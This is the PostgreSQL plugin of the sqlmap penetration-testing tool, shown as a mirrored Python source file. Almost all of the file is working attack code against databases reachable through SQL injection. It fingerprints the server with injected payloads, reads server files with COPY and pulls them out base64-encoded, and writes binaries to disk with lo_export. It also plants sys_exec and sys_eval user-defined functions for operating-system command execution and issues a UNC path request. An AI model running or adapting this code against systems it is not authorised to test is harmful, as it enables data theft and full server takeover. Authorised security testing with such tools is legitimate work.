mirror of
				https://github.com/sqlmapproject/sqlmap.git
				synced 2025-11-04 18:07:46 +03:00 
			
		
		
		
	Minor common library code refactoring. Code cleanup. Set back the default User-Agent to sqlmap for comparison algorithm reasons. Updated THANKS.
		
			
				
	
	
		
			504 lines
		
	
	
		
			18 KiB
		
	
	
	
		
			Python
		
	
	
	
	
	
			
		
		
	
	
			504 lines
		
	
	
		
			18 KiB
		
	
	
	
		
			Python
		
	
	
	
	
	
#!/usr/bin/env python
 | 
						|
 | 
						|
"""
 | 
						|
$Id$
 | 
						|
 | 
						|
This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 | 
						|
 | 
						|
Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 | 
						|
Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 | 
						|
 | 
						|
sqlmap is free software; you can redistribute it and/or modify it under
 | 
						|
the terms of the GNU General Public License as published by the Free
 | 
						|
Software Foundation version 2 of the License.
 | 
						|
 | 
						|
sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
 | 
						|
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
 | 
						|
FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
 | 
						|
details.
 | 
						|
 | 
						|
You should have received a copy of the GNU General Public License along
 | 
						|
with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 | 
						|
Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 | 
						|
"""
 | 
						|
 | 
						|
 | 
						|
 | 
						|
import os
 | 
						|
import re
 | 
						|
 | 
						|
from lib.core.agent import agent
 | 
						|
from lib.core.common import formatDBMSfp
 | 
						|
from lib.core.common import formatFingerprint
 | 
						|
from lib.core.common import getHtmlErrorFp
 | 
						|
from lib.core.common import getRange
 | 
						|
from lib.core.common import randomInt
 | 
						|
from lib.core.common import randomStr
 | 
						|
from lib.core.common import readInput
 | 
						|
from lib.core.data import conf
 | 
						|
from lib.core.data import kb
 | 
						|
from lib.core.data import logger
 | 
						|
from lib.core.data import paths
 | 
						|
from lib.core.exception import sqlmapNoneDataException
 | 
						|
from lib.core.exception import sqlmapSyntaxException
 | 
						|
from lib.core.exception import sqlmapUnsupportedFeatureException
 | 
						|
from lib.core.session import setDbms
 | 
						|
from lib.core.settings import PGSQL_ALIASES
 | 
						|
from lib.core.settings import PGSQL_SYSTEM_DBS
 | 
						|
from lib.core.unescaper import unescaper
 | 
						|
from lib.request import inject
 | 
						|
from lib.request.connect import Connect as Request
 | 
						|
 | 
						|
from plugins.generic.enumeration import Enumeration
 | 
						|
from plugins.generic.filesystem import Filesystem
 | 
						|
from plugins.generic.fingerprint import Fingerprint
 | 
						|
from plugins.generic.misc import Miscellaneous
 | 
						|
from plugins.generic.takeover import Takeover
 | 
						|
 | 
						|
 | 
						|
class PostgreSQLMap(Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
 | 
						|
    """
 | 
						|
    This class defines PostgreSQL methods
 | 
						|
    """
 | 
						|
 | 
						|
    def __init__(self):
 | 
						|
        self.excludeDbsList = PGSQL_SYSTEM_DBS
 | 
						|
 | 
						|
        Enumeration.__init__(self, "PostgreSQL")
 | 
						|
        Filesystem.__init__(self)
 | 
						|
        Takeover.__init__(self)
 | 
						|
 | 
						|
        unescaper.setUnescape(PostgreSQLMap.unescape)
 | 
						|
 | 
						|
 | 
						|
    @staticmethod
 | 
						|
    def unescape(expression, quote=True):
 | 
						|
        if quote:
 | 
						|
            while True:
 | 
						|
                index = expression.find("'")
 | 
						|
                if index == -1:
 | 
						|
                    break
 | 
						|
 | 
						|
                firstIndex = index + 1
 | 
						|
                index = expression[firstIndex:].find("'")
 | 
						|
 | 
						|
                if index == -1:
 | 
						|
                    raise sqlmapSyntaxException, "Unenclosed ' in '%s'" % expression
 | 
						|
 | 
						|
                lastIndex = firstIndex + index
 | 
						|
                old = "'%s'" % expression[firstIndex:lastIndex]
 | 
						|
                #unescaped = "("
 | 
						|
                unescaped = ""
 | 
						|
 | 
						|
                for i in range(firstIndex, lastIndex):
 | 
						|
                    unescaped += "CHR(%d)" % (ord(expression[i]))
 | 
						|
                    if i < lastIndex - 1:
 | 
						|
                        unescaped += "||"
 | 
						|
 | 
						|
                #unescaped += ")"
 | 
						|
                expression = expression.replace(old, unescaped)
 | 
						|
        else:
 | 
						|
            expression = "||".join("CHR(%d)" % ord(c) for c in expression)
 | 
						|
 | 
						|
        return expression
 | 
						|
 | 
						|
 | 
						|
    @staticmethod
 | 
						|
    def escape(expression):
 | 
						|
        while True:
 | 
						|
            index = expression.find("CHR(")
 | 
						|
            if index == -1:
 | 
						|
                break
 | 
						|
 | 
						|
            firstIndex = index
 | 
						|
            index = expression[firstIndex:].find("))")
 | 
						|
 | 
						|
            if index == -1:
 | 
						|
                raise sqlmapSyntaxException, "Unenclosed ) in '%s'" % expression
 | 
						|
 | 
						|
            lastIndex = firstIndex + index + 1
 | 
						|
            old = expression[firstIndex:lastIndex]
 | 
						|
            oldUpper = old.upper()
 | 
						|
            oldUpper = oldUpper.replace("CHR(", "").replace(")", "")
 | 
						|
            oldUpper = oldUpper.split("||")
 | 
						|
 | 
						|
            escaped = "'%s'" % "".join([chr(int(char)) for char in oldUpper])
 | 
						|
            expression = expression.replace(old, escaped)
 | 
						|
 | 
						|
        return expression
 | 
						|
 | 
						|
 | 
						|
    def getFingerprint(self):
 | 
						|
        value  = ""
 | 
						|
        wsOsFp = formatFingerprint("web server", kb.headersFp)
 | 
						|
 | 
						|
        if wsOsFp:
 | 
						|
            value += "%s\n" % wsOsFp
 | 
						|
 | 
						|
        if kb.data.banner:
 | 
						|
            dbmsOsFp = formatFingerprint("back-end DBMS", kb.bannerFp)
 | 
						|
 | 
						|
            if dbmsOsFp:
 | 
						|
                value += "%s\n" % dbmsOsFp
 | 
						|
 | 
						|
        value += "back-end DBMS: "
 | 
						|
 | 
						|
        if not conf.extensiveFp:
 | 
						|
            value += "PostgreSQL"
 | 
						|
            return value
 | 
						|
 | 
						|
        actVer      = formatDBMSfp()
 | 
						|
        blank       = " " * 15
 | 
						|
        value      += "active fingerprint: %s" % actVer
 | 
						|
 | 
						|
        if kb.bannerFp:
 | 
						|
            banVer = kb.bannerFp["dbmsVersion"]
 | 
						|
            banVer = formatDBMSfp([banVer])
 | 
						|
            value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
 | 
						|
 | 
						|
        htmlErrorFp = getHtmlErrorFp()
 | 
						|
 | 
						|
        if htmlErrorFp:
 | 
						|
            value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
 | 
						|
 | 
						|
        return value
 | 
						|
 | 
						|
 | 
						|
    def checkDbms(self):
 | 
						|
        """
 | 
						|
        Reference for fingerprint: http://www.postgresql.org/docs/8.3/interactive/release-8-3.html
 | 
						|
        """
 | 
						|
 | 
						|
        if conf.dbms in PGSQL_ALIASES:
 | 
						|
            setDbms("PostgreSQL")
 | 
						|
 | 
						|
            self.getBanner()
 | 
						|
 | 
						|
            if not conf.extensiveFp:
 | 
						|
                return True
 | 
						|
 | 
						|
        infoMsg = "testing PostgreSQL"
 | 
						|
        logger.info(infoMsg)
 | 
						|
 | 
						|
        randInt = str(randomInt(1))
 | 
						|
 | 
						|
        payload = agent.fullPayload(" AND %s::int=%s" % (randInt, randInt))
 | 
						|
        result  = Request.queryPage(payload)
 | 
						|
 | 
						|
        if result == True:
 | 
						|
            infoMsg = "confirming PostgreSQL"
 | 
						|
            logger.info(infoMsg)
 | 
						|
 | 
						|
            payload = agent.fullPayload(" AND COALESCE(%s, NULL)=%s" % (randInt, randInt))
 | 
						|
            result  = Request.queryPage(payload)
 | 
						|
 | 
						|
            if result != True:
 | 
						|
                warnMsg = "the back-end DMBS is not PostgreSQL"
 | 
						|
                logger.warn(warnMsg)
 | 
						|
 | 
						|
                return False
 | 
						|
 | 
						|
            setDbms("PostgreSQL")
 | 
						|
 | 
						|
            self.getBanner()
 | 
						|
 | 
						|
            if not conf.extensiveFp:
 | 
						|
                return True
 | 
						|
 | 
						|
            transTimeCasted = inject.getValue("SUBSTR(TRANSACTION_TIMESTAMP()::text, 1, 1)", unpack=False) in ( "1", "2" )
 | 
						|
            transTime       = inject.getValue("SUBSTR(TRANSACTION_TIMESTAMP(), 1, 1)", unpack=False) in ( "1", "2" )
 | 
						|
 | 
						|
            if transTimeCasted and not transTime:
 | 
						|
                kb.dbmsVersion = [">= 8.3.0"]
 | 
						|
            elif transTime:
 | 
						|
                kb.dbmsVersion = [">= 8.2.0", "< 8.3.0"]
 | 
						|
            elif inject.getValue("GREATEST(5, 9, 1)", unpack=False) == "9":
 | 
						|
                kb.dbmsVersion = [">= 8.1.0", "< 8.2.0"]
 | 
						|
            elif inject.getValue("WIDTH_BUCKET(5.35, 0.024, 10.06, 5)", unpack=False) == "3":
 | 
						|
                kb.dbmsVersion = [">= 8.0.0", "< 8.1.0"]
 | 
						|
            elif inject.getValue("SUBSTR(MD5('sqlmap'), 1, 1)", unpack=False):
 | 
						|
                kb.dbmsVersion = [">= 7.4.0", "< 8.0.0"]
 | 
						|
            elif inject.getValue("SUBSTR(CURRENT_SCHEMA(), 1, 1)", unpack=False) == "p":
 | 
						|
                kb.dbmsVersion = [">= 7.3.0", "< 7.4.0"]
 | 
						|
            elif inject.getValue("BIT_LENGTH(1)") == "8":
 | 
						|
                kb.dbmsVersion = [">= 7.2.0", "< 7.3.0"]
 | 
						|
            elif inject.getValue("SUBSTR(QUOTE_LITERAL('a'), 2, 1)", unpack=False) == "a":
 | 
						|
                kb.dbmsVersion = [">= 7.1.0", "< 7.2.0"]
 | 
						|
            elif inject.getValue("POW(2, 3)", unpack=False) == "8":
 | 
						|
                kb.dbmsVersion = [">= 7.0.0", "< 7.1.0"]
 | 
						|
            elif inject.getValue("MAX('a')") == "a":
 | 
						|
                kb.dbmsVersion = [">= 6.5.0", "< 6.5.3"]
 | 
						|
            elif re.search("([\d\.]+)", inject.getValue("SUBSTR(VERSION(), 12, 5)", unpack=False)):
 | 
						|
                kb.dbmsVersion = [">= 6.4.0", "< 6.5.0"]
 | 
						|
            elif inject.getValue("SUBSTR(CURRENT_DATE, 1, 1)", unpack=False) == "2":
 | 
						|
                kb.dbmsVersion = [">= 6.3.0", "< 6.4.0"]
 | 
						|
            elif inject.getValue("SUBSTRING('sqlmap', 1, 1)", unpack=False) == "s":
 | 
						|
                kb.dbmsVersion = [">= 6.2.0", "< 6.3.0"]
 | 
						|
            else:
 | 
						|
                kb.dbmsVersion = ["< 6.2.0"]
 | 
						|
 | 
						|
            return True
 | 
						|
        else:
 | 
						|
            warnMsg = "the back-end DMBS is not PostgreSQL"
 | 
						|
            logger.warn(warnMsg)
 | 
						|
 | 
						|
            return False
 | 
						|
 | 
						|
 | 
						|
    def checkDbmsOs(self, detailed=False):
 | 
						|
        if kb.os:
 | 
						|
            return
 | 
						|
 | 
						|
        infoMsg = "fingerprinting the back-end DBMS operating system"
 | 
						|
        logger.info(infoMsg)
 | 
						|
 | 
						|
        self.createSupportTbl(self.fileTblName, self.tblField, "character(500)")
 | 
						|
        inject.goStacked("INSERT INTO %s(%s) VALUES (%s)" % (self.fileTblName, self.tblField, "VERSION()"))
 | 
						|
 | 
						|
        # Windows executables should always have ' Visual C++' or ' mingw'
 | 
						|
        # patterns within the banner
 | 
						|
        osWindows = ( " Visual C++", " mingw" )
 | 
						|
 | 
						|
        for osPattern in osWindows:
 | 
						|
            query  =  "(SELECT LENGTH(%s) FROM %s WHERE %s " % (self.tblField, self.fileTblName, self.tblField)
 | 
						|
            query += "LIKE '%" + osPattern + "%')>0"
 | 
						|
            query  = agent.forgeCaseStatement(query)
 | 
						|
 | 
						|
            if inject.getValue(query, charsetType=1) == "1":
 | 
						|
                kb.os = "Windows"
 | 
						|
 | 
						|
                break
 | 
						|
 | 
						|
        if kb.os == None:
 | 
						|
            kb.os = "Linux"
 | 
						|
 | 
						|
        infoMsg = "the back-end DBMS operating system is %s" % kb.os
 | 
						|
        logger.info(infoMsg)
 | 
						|
 | 
						|
        if detailed == False:
 | 
						|
            self.cleanup(onlyFileTbl=True)
 | 
						|
 | 
						|
            return
 | 
						|
 | 
						|
        self.cleanup(onlyFileTbl=True)
 | 
						|
 | 
						|
 | 
						|
    def forceDbmsEnum(self):
 | 
						|
        if conf.db not in PGSQL_SYSTEM_DBS and conf.db != "public":
 | 
						|
            conf.db = "public"
 | 
						|
 | 
						|
            warnMsg  = "on PostgreSQL it is only possible to enumerate "
 | 
						|
            warnMsg += "on the current schema and on system databases, "
 | 
						|
            warnMsg += "sqlmap is going to use 'public' schema as "
 | 
						|
            warnMsg += "database name"
 | 
						|
            logger.warn(warnMsg)
 | 
						|
 | 
						|
 | 
						|
    def unionReadFile(self, rFile):
 | 
						|
        errMsg  = "PostgreSQL does not support file reading with UNION "
 | 
						|
        errMsg += "query SQL injection technique"
 | 
						|
        raise sqlmapUnsupportedFeatureException, errMsg
 | 
						|
 | 
						|
 | 
						|
    def stackedReadFile(self, rFile):
 | 
						|
        warnMsg  = "binary file read on PostgreSQL is not yet supported, "
 | 
						|
        warnMsg += "if the requested file is binary, its content will not "
 | 
						|
        warnMsg += "be retrieved"
 | 
						|
        logger.warn(warnMsg)
 | 
						|
 | 
						|
        infoMsg = "fetching file: '%s'" % rFile
 | 
						|
        logger.info(infoMsg)
 | 
						|
 | 
						|
        result = []
 | 
						|
 | 
						|
        self.createSupportTbl(self.fileTblName, self.tblField, "bytea")
 | 
						|
 | 
						|
        logger.debug("loading the content of file '%s' into support table" % rFile)
 | 
						|
        inject.goStacked("COPY %s(%s) FROM '%s'" % (self.fileTblName, self.tblField, rFile))
 | 
						|
 | 
						|
        if kb.unionPosition:
 | 
						|
            result = inject.getValue("SELECT ENCODE(%s, 'base64') FROM %s" % (self.tblField, self.fileTblName), unpack=False, resumeValue=False, sort=False)
 | 
						|
 | 
						|
        if not result:
 | 
						|
            result = []
 | 
						|
            count  = inject.getValue("SELECT COUNT(%s) FROM %s" % (self.tblField, self.fileTblName), resumeValue=False, charsetType=2)
 | 
						|
 | 
						|
            if not count.isdigit() or not len(count) or count == "0":
 | 
						|
                errMsg  = "unable to retrieve the content of the "
 | 
						|
                errMsg += "file '%s'" % rFile
 | 
						|
                raise sqlmapNoneDataException, errMsg
 | 
						|
 | 
						|
            indexRange = getRange(count)
 | 
						|
 | 
						|
            for index in indexRange:
 | 
						|
                chunk = inject.getValue("SELECT ENCODE(%s, 'base64') FROM %s OFFSET %d LIMIT 1" % (self.tblField, self.fileTblName, index), unpack=False, resumeValue=False, sort=False)
 | 
						|
                result.append(chunk)
 | 
						|
 | 
						|
        return result
 | 
						|
 | 
						|
 | 
						|
    def unionWriteFile(self, wFile, dFile, fileType, confirm=True):
 | 
						|
        errMsg  = "PostgreSQL does not support file upload with UNION "
 | 
						|
        errMsg += "query SQL injection technique"
 | 
						|
        raise sqlmapUnsupportedFeatureException, errMsg
 | 
						|
 | 
						|
 | 
						|
    def stackedWriteFile(self, wFile, dFile, fileType, confirm=True):
 | 
						|
        wFileSize = os.path.getsize(wFile)
 | 
						|
 | 
						|
        if wFileSize > 8192:
 | 
						|
            errMsg  = "on PostgreSQL it is not possible to write files "
 | 
						|
            errMsg += "bigger than 8192 bytes at the moment"
 | 
						|
            raise sqlmapUnsupportedFeatureException, errMsg
 | 
						|
 | 
						|
        self.oid = randomInt()
 | 
						|
 | 
						|
        debugMsg  = "creating a support table to write the base64 "
 | 
						|
        debugMsg += "encoded file to"
 | 
						|
        logger.debug(debugMsg)
 | 
						|
 | 
						|
        self.createSupportTbl(self.fileTblName, self.tblField, "text")
 | 
						|
 | 
						|
        logger.debug("encoding file to its base64 string value")
 | 
						|
        fcEncodedList = self.fileEncode(wFile, "base64", False)
 | 
						|
 | 
						|
        debugMsg  = "forging SQL statements to write the base64 "
 | 
						|
        debugMsg += "encoded file to the support table"
 | 
						|
        logger.debug(debugMsg)
 | 
						|
 | 
						|
        sqlQueries = self.fileToSqlQueries(fcEncodedList)
 | 
						|
 | 
						|
        logger.debug("inserting the base64 encoded file to the support table")
 | 
						|
 | 
						|
        for sqlQuery in sqlQueries:
 | 
						|
            inject.goStacked(sqlQuery)
 | 
						|
 | 
						|
        debugMsg  = "create a new OID for a large object, it implicitly "
 | 
						|
        debugMsg += "adds an entry in the large objects system table"
 | 
						|
        logger.debug(debugMsg)
 | 
						|
 | 
						|
        # References:
 | 
						|
        # http://www.postgresql.org/docs/8.3/interactive/largeobjects.html
 | 
						|
        # http://www.postgresql.org/docs/8.3/interactive/lo-funcs.html
 | 
						|
        inject.goStacked("SELECT lo_unlink(%d)" % self.oid)
 | 
						|
        inject.goStacked("SELECT lo_create(%d)" % self.oid)
 | 
						|
 | 
						|
        debugMsg  = "updating the system large objects table assigning to "
 | 
						|
        debugMsg += "the just created OID the binary (base64 decoded) UDF "
 | 
						|
        debugMsg += "as data"
 | 
						|
        logger.debug(debugMsg)
 | 
						|
 | 
						|
        # Refereces:
 | 
						|
        # * http://www.postgresql.org/docs/8.3/interactive/catalog-pg-largeobject.html
 | 
						|
        # * http://lab.lonerunners.net/blog/sqli-writing-files-to-disk-under-postgresql
 | 
						|
        #
 | 
						|
        # NOTE: From PostgreSQL site:
 | 
						|
        #
 | 
						|
        #   "The data stored in the large object will never be more than
 | 
						|
        #   LOBLKSIZE bytes and might be less which is BLCKSZ/4, or
 | 
						|
        #   typically 2 Kb"
 | 
						|
        #
 | 
						|
        # As a matter of facts it was possible to store correctly a file
 | 
						|
        # large 13776 bytes, the problem arises at next step (lo_export())
 | 
						|
        inject.goStacked("UPDATE pg_largeobject SET data=(DECODE((SELECT %s FROM %s), 'base64')) WHERE loid=%d" % (self.tblField, self.fileTblName, self.oid))
 | 
						|
 | 
						|
        debugMsg  = "exporting the OID %s file content to " % fileType
 | 
						|
        debugMsg += "file '%s'" % dFile
 | 
						|
        logger.debug(debugMsg)
 | 
						|
 | 
						|
        # NOTE: lo_export() exports up to only 8192 bytes of the file
 | 
						|
        # (pg_largeobject 'data' field)
 | 
						|
        inject.goStacked("SELECT lo_export(%d, '%s')" % (self.oid, dFile))
 | 
						|
 | 
						|
        if confirm == True:
 | 
						|
            self.askCheckWrittenFile(wFile, dFile, fileType)
 | 
						|
 | 
						|
        inject.goStacked("SELECT lo_unlink(%d)" % self.oid)
 | 
						|
 | 
						|
 | 
						|
    def udfInit(self):
 | 
						|
        self.getVersionFromBanner()
 | 
						|
 | 
						|
        banVer = kb.bannerFp["dbmsVersion"]
 | 
						|
        dFile  = None
 | 
						|
        wFile  = paths.SQLMAP_UDF_PATH
 | 
						|
        lib    = "libsqlmapudf%s" % randomStr(lowercase=True)
 | 
						|
 | 
						|
        if banVer >= "8.3":
 | 
						|
            majorVer = "8.3"
 | 
						|
        else:
 | 
						|
            majorVer = "8.2"
 | 
						|
 | 
						|
        if kb.os == "Windows":
 | 
						|
            wFile += "/postgresql/windows/%s/lib_postgresqludf_sys.dll" % majorVer
 | 
						|
            libExt = "dll"
 | 
						|
        else:
 | 
						|
            wFile += "/postgresql/linux/%s/lib_postgresqludf_sys.so" % majorVer
 | 
						|
            libExt = "so"
 | 
						|
 | 
						|
        for udf in ( "sys_exec", "sys_eval" ):
 | 
						|
            if udf in self.createdUdf:
 | 
						|
                continue
 | 
						|
 | 
						|
            logger.info("checking if %s UDF already exist" % udf)
 | 
						|
 | 
						|
            query  = agent.forgeCaseStatement("(SELECT proname='%s' FROM pg_proc WHERE proname='%s' OFFSET 0 LIMIT 1)" % (udf, udf))
 | 
						|
            exists = inject.getValue(query, resumeValue=False, unpack=False)
 | 
						|
 | 
						|
            if exists == "1":
 | 
						|
                message  = "%s UDF already exists, do you " % udf
 | 
						|
                message += "want to overwrite it? [y/N] "
 | 
						|
                output   = readInput(message, default="N")
 | 
						|
 | 
						|
                if output and output in ("y", "Y"):
 | 
						|
                    self.udfToCreate.add(udf)
 | 
						|
            else:
 | 
						|
                self.udfToCreate.add(udf)
 | 
						|
 | 
						|
        if len(self.udfToCreate) > 0:
 | 
						|
            # On Windows
 | 
						|
            if kb.os == "Windows":
 | 
						|
                # The DLL can be in any folder where postgres user has
 | 
						|
                # read/write/execute access is valid
 | 
						|
                # NOTE: by not specifing any path, it will save into the
 | 
						|
                # data directory, on PostgreSQL 8.3 it is
 | 
						|
                # C:\Program Files\PostgreSQL\8.3\data.
 | 
						|
                dFile = "%s.%s" % (lib, libExt)
 | 
						|
 | 
						|
            # On Linux
 | 
						|
            else:
 | 
						|
                # The SO can be in any folder where postgres user has
 | 
						|
                # read/write/execute access is valid
 | 
						|
                dFile = "/tmp/%s.%s" % (lib, libExt)
 | 
						|
 | 
						|
            self.writeFile(wFile, dFile, "binary", False)
 | 
						|
 | 
						|
        for udf, retType in ( ( "sys_exec", "int4" ), ( "sys_eval", "text" ) ):
 | 
						|
            if udf in self.createdUdf:
 | 
						|
                continue
 | 
						|
 | 
						|
            if udf in self.udfToCreate:
 | 
						|
                logger.info("creating %s UDF from the binary UDF file" % udf)
 | 
						|
 | 
						|
                # Reference: http://www.postgresql.org/docs/8.3/interactive/sql-createfunction.html
 | 
						|
                inject.goStacked("DROP FUNCTION %s" % udf)
 | 
						|
                inject.goStacked("CREATE OR REPLACE FUNCTION %s(text) RETURNS %s AS '%s', '%s' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE" % (udf, retType, dFile, udf))
 | 
						|
            else:
 | 
						|
                logger.debug("keeping existing %s UDF as requested" % udf)
 | 
						|
 | 
						|
            self.createdUdf.add(udf)
 | 
						|
 | 
						|
        self.envInitialized = True
 | 
						|
 | 
						|
        debugMsg  = "creating a support table to write commands standard "
 | 
						|
        debugMsg += "output to"
 | 
						|
        logger.debug(debugMsg)
 | 
						|
 | 
						|
        self.createSupportTbl(self.cmdTblName, self.tblField, "text")
 | 
						|
 | 
						|
 | 
						|
    def uncPathRequest(self):
 | 
						|
        self.createSupportTbl(self.fileTblName, self.tblField, "text")
 | 
						|
        inject.goStacked("COPY %s(%s) FROM '%s'" % (self.fileTblName, self.tblField, self.uncPath), silent=True)
 | 
						|
        self.cleanup(onlyFileTbl=True)
 |